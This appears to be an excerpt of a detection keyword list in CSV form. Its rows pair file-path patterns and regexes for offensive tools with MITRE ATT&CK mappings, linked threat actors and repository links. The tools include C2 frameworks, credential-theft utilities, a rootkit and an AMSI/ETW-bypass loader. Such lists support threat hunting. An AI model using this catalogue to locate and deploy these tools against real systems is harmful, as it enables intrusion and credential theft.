"*/net_4.5_64_RunasCs.exe*",".{0,1000}\/net_4\.5_64_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9068"
"*/net_4.5_64SharpDoor.exe*",".{0,1000}\/net_4\.5_64SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9069"
"*/net_4.5_64sharpfiles.exe*",".{0,1000}\/net_4\.5_64sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9070"
"*/net_4.5_Any_RunasCs.exe*",".{0,1000}\/net_4\.5_Any_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9071"
"*/net_4.5_AnySharpDoor.exe*",".{0,1000}\/net_4\.5_AnySharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9072"
"*/net_4.5_Anysharpfiles.exe*",".{0,1000}\/net_4\.5_Anysharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9073"
"*/net_4.7_32_RunasCs.exe*",".{0,1000}\/net_4\.7_32_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9074"
"*/net_4.7_64_RunasCs.exe*",".{0,1000}\/net_4\.7_64_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9075"
"*/net_4.7_Any_RunasCs.exe*",".{0,1000}\/net_4\.7_Any_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9076"
"*/net_portscan.py*",".{0,1000}\/net_portscan\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","9077"
"*/net_recon/*",".{0,1000}\/net_recon\/.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","9078"
"*/net_sniff.*",".{0,1000}\/net_sniff\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","9079"
"*/net_sniff_*.*",".{0,1000}\/net_sniff_.{0,1000}\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","9080"
"*/NETAMSI.ps1*",".{0,1000}\/NETAMSI\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","9081"
"*/netbus-auth-bypass.nse*",".{0,1000}\/netbus\-auth\-bypass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9082"
"*/netbus-brute.nse*",".{0,1000}\/netbus\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9083"
"*/netbus-info.nse*",".{0,1000}\/netbus\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9084"
"*/netbus-version.nse*",".{0,1000}\/netbus\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9085"
"*/NetClone.exe*",".{0,1000}\/NetClone\.exe.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","1","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","9087"
"*/netcreds.py*",".{0,1000}\/netcreds\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","9088"
"*/netcreds.py*",".{0,1000}\/netcreds\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","9089"
"*/NetExec.git*",".{0,1000}\/NetExec\.git.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9090"
"*/netexec.py*",".{0,1000}\/netexec\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9091"
"*/NetExec-main*",".{0,1000}\/NetExec\-main.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9092"
"*/Net-GPPPassword.exe*",".{0,1000}\/Net\-GPPPassword\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","9093"
"*/Net-GPPPassword.git*",".{0,1000}\/Net\-GPPPassword\.git.{0,1000}","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","N/A","10","2","172","36","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z","9094"
"*/nethunter-images/*",".{0,1000}\/nethunter\-images\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","9095"
"*/netkit.git*",".{0,1000}\/netkit\.git.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","1","N/A","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","9096"
"*/netkit/client/shell.py*",".{0,1000}\/netkit\/client\/shell\.py.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","1","N/A","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","9097"
"*/netkit/src/netkit.*",".{0,1000}\/netkit\/src\/netkit\..{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","1","N/A","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","9098"
"*/NetLoader.git*",".{0,1000}\/NetLoader\.git.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","N/A","10","9","820","147","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z","9099"
"*/netntlm.pl*",".{0,1000}\/netntlm\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","9100"
"*/NetNTLMtoSilverTicket*",".{0,1000}\/NetNTLMtoSilverTicket.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","9101"
"*/NetRipper.dll*",".{0,1000}\/NetRipper\.dll.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","1","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","9102"
"*/NetRipper.exe*",".{0,1000}\/NetRipper\.exe.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","1","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","9103"
"*/NetRipper.git*",".{0,1000}\/NetRipper\.git.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","1","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","9104"
"*/NetRipper.x64.exe*",".{0,1000}\/NetRipper\.x64\.exe.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","1","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","9105"
"*/NetRipper.x86.exe*",".{0,1000}\/NetRipper\.x86\.exe.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","1","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","9106"
"*/NetRipperLog.txt*",".{0,1000}\/NetRipperLog\.txt.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#linux","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","9107"
"*/NetSess.exe*",".{0,1000}\/NetSess\.exe.{0,1000}","offensive_tool_keyword","NetSess","Command line tool to enumerate NetBIOS sessions on a specified local or remote machine. ","T1016 - T1046 - T1087","TA0007 - TA0043","N/A","MUSTANG PANDA","Discovery","https://www.joeware.net/freetools/tools/netsess/","1","1","N/A","N/A","7","9","N/A","N/A","N/A","N/A","9114"
"*/NetSess.zip*",".{0,1000}\/NetSess\.zip.{0,1000}","offensive_tool_keyword","NetSess","Command line tool to enumerate NetBIOS sessions on a specified local or remote machine. ","T1016 - T1046 - T1087","TA0007 - TA0043","N/A","MUSTANG PANDA","Discovery","https://www.joeware.net/freetools/tools/netsess/","1","1","N/A","N/A","7","9","N/A","N/A","N/A","N/A","9115"
"*/NetshHelperBeacon.git*",".{0,1000}\/NetshHelperBeacon\.git.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","1","N/A","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","9116"
"*/netsparker.rb*",".{0,1000}\/netsparker\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9118"
"*/netstat_windows.go*",".{0,1000}\/netstat_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","9119"
"*/nettitude/*",".{0,1000}\/nettitude\/.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9120"
"*/nettitude/RunOF/*",".{0,1000}\/nettitude\/RunOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","9121"
